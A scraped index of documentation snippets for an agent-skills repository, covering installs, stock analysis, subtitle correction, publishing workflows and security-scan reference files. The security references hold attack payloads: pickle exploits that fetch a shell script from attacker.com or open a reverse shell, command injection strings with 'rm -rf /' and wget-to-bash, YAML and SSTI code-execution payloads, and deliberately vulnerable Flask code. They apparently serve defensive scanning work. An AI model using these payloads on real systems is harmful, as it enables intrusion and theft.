### Install and Verify akshare
Source: https://context7.com/sugarforever/01coder-agent-skills/llms.txt
Installs the akshare library and pandas/numpy, then verifies the akshare installation by printing its version.
```bash
pip install akshare pandas numpy
python -c "import akshare; print(akshare.__version__)"
```
--------------------------------
### Install Dependencies
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/china-stock-analysis/SKILL.md
Install the necessary Python libraries for the stock analysis skill. Ensure you have Python and pip installed.
```bash
pip install akshare pandas numpy
```
--------------------------------
### Example Video Directory Creation
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/video-script/SKILL.md
An example of how a date-based directory for a video on 'React Server Components' might look.
```bash
./videos/2026-03-07-react-server-components/
```
--------------------------------
### Check akshare Installation
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/china-stock-analysis/SKILL.md
Verify if the akshare library is installed and check its version. If not installed, this command will fail, prompting you to install it.
```bash
python -c "import akshare; print(akshare.__version__)"
```
--------------------------------
### Install akshare if Missing
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/china-stock-analysis/SKILL.md
Command to install the akshare library if it's not found on your system. This is a prerequisite for using the stock analysis tools.
```bash
pip install akshare
```
--------------------------------
### Install Agent Skills Collection
Source: https://context7.com/sugarforever/01coder-agent-skills/llms.txt
Commands to add the Agent Skills marketplace source and install the '01coder-skills' plugin bundle.
```bash
# Step 1 – add the marketplace source
/plugin marketplace add sugarforever/01coder-agent-skills
# Step 2 – install the plugin bundle
/plugin install 01coder-skills@01coder-agent-skills
```
--------------------------------
### Install Mermaid CLI for Diagram to Image and Publish X Article
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md
Installs the mermaid-cli globally using npm. This is required for the Diagram to Image and Publish X Article skills.
```bash
npm install -g @mermaid-js/mermaid-cli
```
--------------------------------
### Install Python Dependencies for Diagram to Image
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md
Installs the Pillow library for image manipulation, required by the Diagram to Image skill.
```bash
pip install pillow
```
--------------------------------
### Install and Add Marketplace
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/CLAUDE.md
Commands to add the marketplace to Claude Code and then install a specific plugin from that marketplace. New skills are automatically detected on marketplace updates.
```bash
/plugin marketplace add sugarforever/01coder-agent-skills
/plugin install 01coder-skills@01coder-agent-skills
```
--------------------------------
### Install Python Dependencies for Publish X Article (Windows)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md
Installs Python dependencies for the Publish X Article skill on Windows. Requires Python 3.9+.
```bash
pip install Pillow pywin32 clip-util markdown
```
--------------------------------
### Usage Examples for China Stock Analysis
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md
These are example commands for interacting with the China Stock Analysis skill. They demonstrate how to perform stock screening, analysis, industry comparison, and valuation calculations.
```bash
分析贵州茅台
```
```bash
筛选PE小于15、ROE大于15%的沪深300股票
```
```bash
对比白酒行业前10名
```
```bash
计算600519的内在价值
```
--------------------------------
### Install Python Dependencies for Publish X Article (macOS)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md
Installs Python dependencies for the Publish X Article skill on macOS. Requires Python 3.9+.
```bash
pip install Pillow pyobjc-framework-Cocoa markdown
```
--------------------------------
### Pickle exploit example
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/deserialization.md
This example demonstrates how to create a malicious pickle payload that executes arbitrary code on the server when deserialized. The `__reduce__` method is leveraged to call `os.system`.
```python
import pickle
import os
class Exploit:
def __reduce__(self):
return (os.system, ('curl http://attacker.com/shell.sh | bash',))
# Generate malicious payload
payload = pickle.dumps(Exploit())
# Send payload to vulnerable endpoint
```
--------------------------------
### SRT File Structure Example
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/subtitle-correction/references/srt-format.md
Illustrates the basic structure of an SRT file, showing sequential entries with timestamps and text content. Each entry is separated by an empty line.
```srt
1
00:00:01,500 --> 00:00:04,500
First line of subtitle text
Optional second line
2
00:00:04,700 --> 00:00:07,666
Next subtitle text
```
--------------------------------
### Example Candidate Post 1: Summary Recommendation (Chinese)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/share-reading/SKILL.md
A candidate social media post in Chinese, summarizing the article and offering a recommendation. Includes the source link.
```chinese
Rust 正式进入 Linux 6.12 内核的网络子系统。这意味着内核中最关键、也最容易出内存安全问题的模块,开始用 Rust 重写了。
文章详细讲了迁移策略:不是一刀切,而是新模块用 Rust 写,老代码逐步替换。最实际的一点 - 已经在生产环境跑了 3 个月,零内存安全 bug。
https://example.com/article-about-rust-in-linux
```
--------------------------------
### Example Image Upload Workflow (Markdown Mode)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-zsxq-article/SKILL.md
Steps to upload an image in Markdown mode, including taking a verbose snapshot, identifying the 'Add image' button, uploading the file, and verifying with a screenshot.
```python
# 1. Take verbose snapshot to find image button
take_snapshot(verbose=true)
# 2. Find "Add image" button (e.g., uid=26_59)
# Look for: generic description="Add image"
# 3. Upload image directly to the button
upload_file:
uid: 26_59 # (example uid for "Add image" button)
filePath: /Users/user/Downloads/image.png
# 4. Verify with screenshot
take_screenshot
```
--------------------------------
### User Interaction Example 1: Upload without terms
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/subtitle-correction/SKILL.md
Demonstrates a user uploading a subtitle file without providing initial terms, prompting Claude to request them.
```text
User: 帮我修正这个字幕文件
Claude:
在开始修正之前,请提供一些关键术语,帮助我更准确地识别语音识别错误:
1. **专有名词**:人名、品牌名、产品名
2. **技术术语**:框架、库、工具名称
3. **领域词汇**:行业特定词汇
4. **其他关键词**:视频中频繁出现的重要词汇
请用逗号分隔,例如:`LangChain, Agent, OpenAI`
User: LangChain, Agent, OpenAI, LangGraph, checkpointer
Claude:
收到以下术语:
- 技术框架:LangChain, LangGraph, OpenAI
- 技术概念:Agent, checkpointer
这是一个 LangChain 相关的技术教程。还有补充吗?
User: 没有了,开始吧
Claude: [Proceeds with correction workflow]
```
--------------------------------
### Apply Feishu Skill
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md
Applies the Feishu skill package to deterministically modify project files, install dependencies, and update configuration.
```bash
npx tsx scripts/apply-skill.ts .claude/skills/add-feishu
```
--------------------------------
### Markdown Image Reference Example
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-x-article/SKILL.md
Example of how to reference a generated image within a markdown document. This replaces a diagram or table that cannot be directly rendered.
```markdown

```
--------------------------------
### User Interaction Example 2: Provide terms upfront
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/subtitle-correction/SKILL.md
Illustrates a user providing key terms upfront when requesting subtitle correction, allowing Claude to proceed directly.
```text
User: 帮我修正字幕,术语:LangChain, OpenAI, Agent
Claude: [Confirms terms, then proceeds directly]
```
--------------------------------
### Example Image Upload Workflow (Rich Text Mode)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-zsxq-article/SKILL.md
Steps to upload an image in Rich Text mode, including taking a snapshot, identifying the 'image' button, uploading the file, and verifying with a screenshot.
```python
# 1. Take snapshot to find image button
take_snapshot
# 2. Find image button (e.g., uid=12_7)
# Look for: button "image"
# 3. Upload image to the button
upload_file:
uid: 12_7 # (example uid for image button)
filePath: /Users/user/Downloads/image.png
# 4. Verify with screenshot
take_screenshot
```
--------------------------------
### Example Candidate Post 3: Discussion Starter (Chinese)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/share-reading/SKILL.md
A candidate social media post in Chinese, framing a question around the content to spark engagement. Includes the source link.
```chinese
Linux 内核的网络子系统开始用 Rust 了。跑了 3 个月,零内存安全 bug。
但评论区有个好问题:Rust 的编译时间和学习曲线,对内核贡献者社区的影响会有多大?快速迭代和安全保障之间,怎么平衡?
https://example.com/article-about-rust-in-linux
```
--------------------------------
### Basic FastAPI Input Validation Example
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/fastapi-security.md
Illustrates a basic FastAPI endpoint for retrieving user data, highlighting a potential vulnerability if the user_id is not properly validated as an integer.
```python
from fastapi import FastAPI, Query
# No input validation
@app.get("/users/{user_id}")
async def get_user(user_id: str): # Should be int
return db.query(f"SELECT * FROM users WHERE id = {user_id}")
```
--------------------------------
### Clone Agent Skills Repository
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md
This command clones the agent-skills repository from GitHub. Ensure you have Git installed and configured.
```bash
git clone https://github.com/sugarforever/agent-skills.git
```
--------------------------------
### Server Components Data Exposure (Safe Alternative)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/nextjs-specific.md
This example demonstrates a safe alternative for Server Components by selecting only necessary, non-sensitive data before passing it to Client Components.
```typescript
// ✅ SAFE - Only pass necessary data
async function UserProfile() {
const user = await db.user.findUnique({
select: {
id: true,
name: true,
email: true
// No sensitive fields
}
});
return ;
}
```
--------------------------------
### Command Injection: Attack Payloads
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/injection-patterns.md
Provides examples of common attack payloads for command injection, including command chaining with `;`, `&&`, `||`, subshell execution using `$(...)` or `` `...` ``, and input/output redirection.
```bash
# Command chaining
; rm -rf /
&& cat /etc/passwd
|| wget http://evil.com/shell.sh | bash
# Subshell execution
$(cat /etc/passwd)
`cat /etc/passwd`
# Input redirection
< /etc/passwd
> /tmp/pwned
```
--------------------------------
### Example Candidate Post 2: Key Highlight (Chinese)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/share-reading/SKILL.md
A candidate social media post in Chinese, highlighting a key quote or point from the article and adding brief context. Includes the source link.
```chinese
"我们不是要用 Rust 重写 Linux,而是让新代码不再产生旧问题。"
Linux 网络子系统开始引入 Rust,最值得关注的不是语言之争,而是他们的渐进式迁移策略 - 这对所有大型 C 项目都有参考价值。
https://example.com/article-about-rust-in-linux
```
--------------------------------
### PyYAML exploit examples
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/deserialization.md
Demonstrates various PyYAML exploit payloads, including executing system commands, reading files, and arbitrary code execution using `!!python/object/apply` and `!!python/object/new` tags.
```yaml
# Execute system command
!!python/object/apply:os.system ['id']
# Execute with subprocess
!!python/object/apply:subprocess.check_output [['cat', '/etc/passwd']]
# Arbitrary code execution
!!python/object/apply:builtins.eval ['__import__("os").system("id")']
# Read files
!!python/object/apply:builtins.open ['etc/passwd']
# Complex payload
!!python/object/new:type
args: ['exploit', !!python/tuple [], {'__reduce__': !!python/object/apply:builtins.eval ['lambda: __import__("os").system("id")']}]
```
--------------------------------
### LDAP Injection: Attack Payloads
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/injection-patterns.md
Provides examples of attack payloads for LDAP injection, demonstrating how to bypass authentication or manipulate search filters using special characters and logical operators.
```text
# Bypass authentication
*)(uid=*))(|(uid=*
admin)(|(password=*
*))%00
```
--------------------------------
### Implement Rate Limiting with Flask-Limiter
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md
Apply rate limiting to Flask routes using Flask-Limiter to prevent abuse. This example demonstrates setting default limits and specific limits for login and API endpoints.
```python
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
limiter = Limiter(
app,
key_func=get_remote_address,
default_limits=["200 per day", "50 per hour"]
)
@app.route('/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
# Login logic
pass
@app.route('/api/data')
@limiter.limit("100 per minute")
def api_data():
pass
```
--------------------------------
### Initialize Skills System
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md
Run this command if the .nanoclaw/ directory does not exist to initialize the skills system.
```bash
npx tsx scripts/apply-skill.ts --init
```
--------------------------------
### SRT Subtitle Correction Example
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/subtitle-correction/references/srt-format.md
Demonstrates a before-and-after comparison of subtitle text correction in an SRT file. The 'Before' example shows errors, while the 'After' example presents the corrected version.
```srt
53
00:02:23,433 --> 00:02:25,833
定义了一款工具summers conversation
54
00:02:26,133 --> 00:02:28,166
这款工具除了用了Lantern
```
```srt
53
00:02:23,433 --> 00:02:25,833
定义了一款工具summarize_conversation
54
00:02:26,133 --> 00:02:28,166
这款工具除了用了LangChain
```
--------------------------------
### FastAPI Framework Detection
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/fastapi-security.md
Python code demonstrating how to import FastAPI and initialize an application instance.
```python
from fastapi import FastAPI
from fastapi import *
app = FastAPI()
```
--------------------------------
### Install Pip-Audit for Python Security Scan
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/README.md
Installs pip-audit, a tool for auditing Python package vulnerabilities, required for the Python Security Scan skill.
```bash
pip install pip-audit
```
--------------------------------
### Multiple Choice Example
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/interactive-input/references/schema.md
An example of an interactive card for a multiple-choice question, allowing users to select multiple options. The 'isMultiSelect' property is set to true.
```interactive
{
"id": "even-numbers",
"card": {
"body": [
{ "type": "TextBlock", "text": "Select all even numbers:", "weight": "bold" },
{ "type": "Input.ChoiceSet", "id": "answer", "style": "expanded", "isMultiSelect": true,
"choices": [
{ "title": "12", "value": "12" },
{ "title": "15", "value": "15" },
{ "title": "28", "value": "28" },
{ "title": "33", "value": "33" }
]
}
],
"actions": [{ "type": "Action.Submit", "title": "Submit" }]
}
}
```
--------------------------------
### Rebuild and Restart Application (Linux)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md
Rebuild the application and restart the Nanoclaw service on Linux.
```bash
npm run build && systemctl --user restart nanoclaw
```
--------------------------------
### Single Choice Quiz Example
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/interactive-input/references/schema.md
An example of a complete interactive card for a single-choice quiz question. It includes a text block for the question and a choice set for the answers.
```interactive
{
"id": "math-q1",
"card": {
"body": [
{ "type": "TextBlock", "text": "What is 2 + 3 × 4?", "weight": "bold" },
{ "type": "Input.ChoiceSet", "id": "answer", "style": "expanded",
"choices": [
{ "title": "A. 20", "value": "20" },
{ "title": "B. 14", "value": "14" },
{ "title": "C. 24", "value": "24" },
{ "title": "D. 11", "value": "11" }
]
}
],
"actions": [{ "type": "Action.Submit", "title": "Submit" }]
}
}
```
--------------------------------
### Vulnerable Flask SSTI Examples
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md
Examples demonstrating Server-Side Template Injection (SSTI) in Flask by rendering user-controlled input directly within templates. This can lead to arbitrary code execution.
```python
from flask import render_template_string
# Direct user input in template
@app.route('/hello')
def hello():
name = request.args.get('name')
return render_template_string(f'Hello {name}!')
# Template from user input
@app.route('/template')
def custom_template():
template = request.form.get('template')
return render_template_string(template)
```
--------------------------------
### Vulnerable Flask Secret Key Examples
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md
Examples of insecure Flask secret key configurations. Using default or easily guessable keys can lead to session cookie forgery and other attacks.
```python
app.secret_key = 'development'
app.config['SECRET_KEY'] = 'super-secret-key'
SECRET_KEY = 'change-me'
```
--------------------------------
### Create Date-Based Video Directory Structure
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/video-script/SKILL.md
This is the standard directory structure for organizing video content. It includes a date-based folder with a short slug, containing script, blog, and platform-specific publishing files.
```bash
./videos/{YYYY-MM-DD}-{short-slug}/
├── script.md # 视频口播稿
├── blog.md # 博客文章
├── youtube.md # YouTube 发布素材
└── bilibili.md # Bilibili 发布素材
```
--------------------------------
### Navigate to X Articles Editor
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-x-article/SKILL.md
Opens the X articles composition page in the browser. Note that after loading, a draft list appears; you must click 'create' to open the editor.
```shell
browser_navigate: https://x.com/compose/articles
```
--------------------------------
### Configure Environment Variables
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md
Adds Feishu App ID and App Secret to the .env file for authentication.
```bash
FEISHU_APP_ID=
FEISHU_APP_SECRET=
```
--------------------------------
### XML Deserialization Exploit Examples
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/deserialization.md
Provides examples of XML payloads designed to exploit XXE vulnerabilities for reading local files or performing Server-Side Request Forgery (SSRF), and a Billion Laughs attack for Denial-of-Service.
```xml
]>
&xxe;
]>
&xxe;
]>
&lol9;
```
--------------------------------
### Validate Code Changes
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md
Builds the project to ensure code changes are clean and valid before proceeding with setup.
```bash
npm run build
```
--------------------------------
### Diagram Conversion with Options
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md
Converts a diagram to an image, allowing customization of theme, type, scale, background color, and server URL. Use this to tailor the output image appearance and behavior.
```bash
node ~/.claude/skills/diagram-to-image/scripts/diagram-to-image.mjs /tmp/table.md -o .png --type table --theme dark --scale 3 --bg "transparent" --server https://diagramless.xyz
```
--------------------------------
### macOS Pyperclip Dependency
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-substack-article/SKILL.md
If the `copy_to_clipboard.py` script fails on macOS, ensure the `pyobjc-framework-Cocoa` dependency is installed. This is required for clipboard access on macOS.
```bash
pip install pyobjc-framework-Cocoa
```
--------------------------------
### Header Injection Attack Payloads
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/injection-patterns.md
Examples of payloads for CRLF injection in headers, allowing the injection of new lines and potentially malicious content.
```regex
# CRLF injection
value\r\nX-Injected: malicious
value\r\n\r\n
```
--------------------------------
### Detect Weak Password Validation (TypeScript)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/owasp-top-10.md
Example of insufficient password length validation. Implement strong password policies and complexity requirements.
```typescript
if (password.length >= 4) { ... }
```
--------------------------------
### Check Next.js Version and Vulnerabilities
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/nextjs-specific.md
Use npm commands to check your Next.js version, identify outdated packages, and audit for known vulnerabilities. Keeping your dependencies up-to-date is crucial for security.
```bash
# Check Next.js version
npm list next
# Check for outdated packages
npm outdated
# Check for known vulnerabilities
npm audit
```
--------------------------------
### Implement Rate Limiting with SlowAPI
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/fastapi-security.md
Apply rate limiting to specific API endpoints to prevent abuse. Ensure SlowAPI is installed and configured with the application.
```python
from slowapi import Limiter, _rate_limit_exceeded_handler
from slowapi.util import get_remote_address
from slowapi.errors import RateLimitExceeded
limiter = Limiter(key_func=get_remote_address)
app.state.limiter = limiter
app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler)
@app.post("/login")
@limiter.limit("5/minute")
async def login(request: Request, credentials: Credentials):
pass
@app.post("/password-reset")
@limiter.limit("3/hour")
async def reset_password(request: Request, email: str):
pass
```
--------------------------------
### Initial Promotion Information Request
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/video-script/SKILL.md
On the first use, this prompt asks the user for their personal promotion details to be saved for future use. This includes social media links, community links, contact information, and other fixed promotional content.
```text
我注意到这是你第一次使用视频脚本 skill。请提供你的个人推广信息,我会记住以便后续使用:
- 社交媒体链接(Twitter、Bilibili、YouTube 等)
- 知识星球/社群链接
- 联系方式
- 其他固定推广信息(如课程链接、赞助信息等)
```
--------------------------------
### LDAP Injection Vulnerable Patterns
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/injection-patterns.md
Vulnerable code examples demonstrating LDAP injection using string concatenation and template literals with user input.
```typescript
// ❌ VULNERABLE
const filter = `(uid=${username})`;
const filter = '(cn=' + searchTerm + ')';
```
--------------------------------
### Template Injection (SSTI) Attack Payloads
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/injection-patterns.md
Examples of payloads used to exploit SSTI vulnerabilities, including accessing configuration, and achieving Remote Code Execution (RCE).
```python
# Read config
{{ config }}
{{ config.items() }}
# RCE via Jinja2
{{ ''.__class__.__mro__[2].__subclasses__() }}
{{ ''.__class__.__base__.__subclasses__()[X].__init__.__globals__['os'].popen('id').read() }}
# Flask specific
{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}
```
--------------------------------
### Navigate to Zsxq Article Editor
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-zsxq-article/SKILL.md
Navigates to the Zsxq article editor page. If not logged in, the user will be prompted to log in manually.
```bash
# Navigate to the article editor with group ID
navigate_page: https://wx.zsxq.com/article?groupId=51111858848454
```
--------------------------------
### Check for existing image directories
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md
Find the most appropriate directory for saving generated images based on common project conventions.
```bash
# Check for existing image directories (in order of preference)
ls -d ./images ./assets ./img ./static ./public/images ./assets/images 2>/dev/null | head -1
```
--------------------------------
### Generate Video Script and Assets
Source: https://context7.com/sugarforever/01coder-agent-skills/llms.txt
Generates a full content package for a video, including spoken script, blog article, and platform-specific publishing materials. Requires user input on topic, platform, duration, and key points.
```bash
# Trigger phrases
写视频脚本 / 视频口播稿 / video script / prepare video / 视频发布素材
# Output directory structure
./videos/2026-03-07-react-server-components/
├── script.md # 口播稿 – conversational spoken script
├── blog.md # standalone blog article (not a transcript)
├── youtube.md # title, description, tags, chapter timestamps
└── bilibili.md # same content, Bilibili-adapted promo placement
# Trigger conversation
请提供以下信息:
1. 视频主题(必填)
2. 目标平台:YouTube / Bilibili / 两者
3. 目标时长(默认 10 分钟)
4. 目标观众(如:开发者、AI 爱好者)
5. 关键要点或大纲
6. 参考资料 URL(可选)
```
--------------------------------
### Create New X Article
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-x-article/SKILL.md
After navigating to the articles page, this command clicks the 'create' button to open the article editor. It relies on a browser snapshot to identify the button.
```shell
# 1. 导航到页面
browser_navigate: https://x.com/compose/articles
# 2. 获取页面快照,找到 create 按钮
browser_snapshot
# 3. 点击 create 按钮(通常 ref 类似 "create" 或带有 create 标签)
browser_click: element="create button", ref=
# 4. 现在编辑器应该打开了,可以继续上传封面图等操作
```
--------------------------------
### Determine output path logic
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md
Illustrates the decision-making process for selecting an output path for the generated image, prioritizing user specification and project context.
```bash
# Example logic (implement mentally, not as literal script)
if user_specified_path:
output_path = user_specified_path
elif exists("./images"):
output_path = "./images/{generated_name}.png"
elif exists("./assets"):
output_path = "./assets/{generated_name}.png"
elif exists("./public/images"):
output_path = "./public/images/{generated_name}.png"
else:
output_path = "./{generated_name}.png"
```
--------------------------------
### Convert diagram to PNG with custom theme
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md
Convert a diagram to a PNG image using the bundled script and apply a custom theme.
```bash
# With custom theme
node ~/.claude/skills/diagram-to-image/scripts/diagram-to-image.mjs /tmp/diagram.mmd -o .png --theme ocean
```
--------------------------------
### Server Actions With Input Validation (Safe)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/nextjs-specific.md
This example shows a safe Server Action that incorporates input validation using Zod to ensure data integrity and security.
```typescript
// ✅ SAFE - With validation
'use server'
import { z } from 'zod';
const postSchema = z.object({
title: z.string().min(1).max(200),
content: z.string().min(1).max(10000)
});
export async function createPost(formData: FormData) {
const result = postSchema.safeParse({
title: formData.get('title'),
content: formData.get('content')
});
if (!result.success) {
return { error: result.error.flatten() };
}
await db.post.create({ data: result.data });
}
```
--------------------------------
### Rebuild and Restart Application (macOS)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/add-feishu/SKILL.md
Rebuild the application and restart the Nanoclaw service on macOS.
```bash
npm run build && launchctl kickstart -k gui/$(id -u)/com.nanoclaw
```
--------------------------------
### Convert Markdown to HTML with Python
Source: https://context7.com/sugarforever/01coder-agent-skills/llms.txt
Converts a Markdown file to HTML, stripping YAML frontmatter and handling tables and fenced code blocks. Ensure the 'markdown' library is installed.
```python
import markdown, re
with open('/path/to/article.md') as f:
content = f.read()
# Strip YAML frontmatter
content = re.sub(r'^---\n.*?\n---\n', '', content, flags=re.DOTALL)
# Convert — do NOT use nl2br extension (causes double line breaks)
html = markdown.markdown(content, extensions=['tables', 'fenced_code'])
with open('/tmp/substack_article.html', 'w') as f:
f.write(html)
```
--------------------------------
### Complete Article Publishing Flow
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-zsxq-article/SKILL.md
A step-by-step outline for publishing an article to Zsxq, from reading the file to reporting success.
```text
1. Read /path/to/my-article.md
- Extract title from H1 or first line
- Get full content
2. Navigate to https://wx.zsxq.com/article?groupId=51111858848454
3. Check if logged in
- If not, prompt user to login
4. Switch to Markdown mode if needed
- Click "切换到 Markdown 模式 (内测)"
- Confirm dialog
5. Fill title
- Click title input
- Use `fill` tool to set title text
6. Insert content via paste event
- Use `evaluate_script` to simulate paste event
- This triggers Milkdown to parse and render Markdown
7. Save as draft
- Click "保存"
8. Report success
- "草稿已保存,请手动预览并发布"
```
--------------------------------
### Flask SSTI Exploit Examples
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md
Illustrative exploit payloads for Server-Side Template Injection (SSTI) in Flask, showing how to access configuration and execute arbitrary operating system commands.
```jinja
# Access config
{{ config }}
{{ config.SECRET_KEY }}
# RCE
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}
```
--------------------------------
### Check bundled script location
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md
Verify the location of the bundled diagram-to-image rendering script.
```bash
# The render script is bundled with this skill:
SKILL_DIR=~/.claude/skills/diagram-to-image/scripts
ls $SKILL_DIR/diagram-to-image.mjs
```
--------------------------------
### Enable Flask Debug Mode
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md
Vulnerable code examples that enable Flask's debug mode, exposing the Werkzeug debugger with code execution capabilities. This should not be used in production.
```python
# Exposes Werkzeug debugger with code execution
app.run(debug=True)
app.config['DEBUG'] = True
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0') # Exposed to network!
```
--------------------------------
### More sophisticated pickle exploits
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/deserialization.md
These examples showcase advanced pickle exploitation techniques using `subprocess`, `eval`, and chained exploitation to achieve code execution or establish reverse shells.
```python
# Using subprocess for more control
class Exploit:
def __reduce__(self):
import subprocess
return (subprocess.check_output, (['cat', '/etc/passwd'],))
# Using eval
class Exploit:
def __reduce__(self):
return (eval, ("__import__('os').system('id')",))
# Chained exploitation
class Exploit:
def __reduce__(self):
return (
exec,
("import socket,subprocess,os;s=socket.socket();s.connect(('attacker.com',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])",)
)
```
--------------------------------
### Create temporary input file for Mermaid diagrams
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md
Temporarily store Mermaid diagram content in a file for processing.
```bash
# For Mermaid diagrams
cat > /tmp/diagram.mmd << 'DIAGRAM_EOF'
DIAGRAM_EOF
```
--------------------------------
### Terminal Diff Output Example
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/subtitle-correction/SKILL.md
The default terminal output for the diff command shows word-level changes with color coding. Deleted text is in red and added text is in green.
```text
[1] 00:00:01,500 --> 00:00:04,500
今天我们来学习[-Luncheon-]{+LangChain+}框架
[3] 00:00:08,000 --> 00:00:12,500
我们可以用它来创建[-绘画-]{+会话+}应用程序
```
--------------------------------
### Secure Temporary File and Directory Creation in Python
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/python-vulnerabilities.md
Utilize the `tempfile` module to securely create temporary files and directories, mitigating race conditions and symlink attacks.
```python
import tempfile
# Secure temporary file
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(data)
temp_path = f.name
# Secure temporary directory
with tempfile.TemporaryDirectory() as tmpdir:
filepath = os.path.join(tmpdir, 'file.txt')
```
--------------------------------
### Check and Compress Image Size (Bash)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-zsxq-article/SKILL.md
Use bash commands to check an image's file size and compress it using sips on macOS if it exceeds recommended limits.
```bash
# Check size
ls -la /path/to/image.png
```
```bash
# Compress if needed (macOS)
sips -s format jpeg -s formatOptions 80 /path/to/image.png --out /path/to/image_compressed.jpg
```
--------------------------------
### Personal Writing Style Guide
Source: https://context7.com/sugarforever/01coder-agent-skills/llms.txt
Provides a quick reference for punctuation, article structure, and YAML frontmatter conventions for Chinese content. Ensures consistent formatting and prose style.
```markdown
| Element | Use | Avoid |
|----------------|--------------|--------------|
| Dash | ` - ` (space-hyphen-space) | `——` |
| Ellipsis | `......` | `……` |
| Quotes (body) | `""` curved | `""` straight|
- No numbered scaffolding or explicit "总结" sections
- Paragraphs flow as natural prose; transitions bridge topics
- Technical names and code use ASCII; body text uses Chinese punctuation
---
title: "My Article"
---
```
--------------------------------
### Command Injection: Safe Alternatives
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/injection-patterns.md
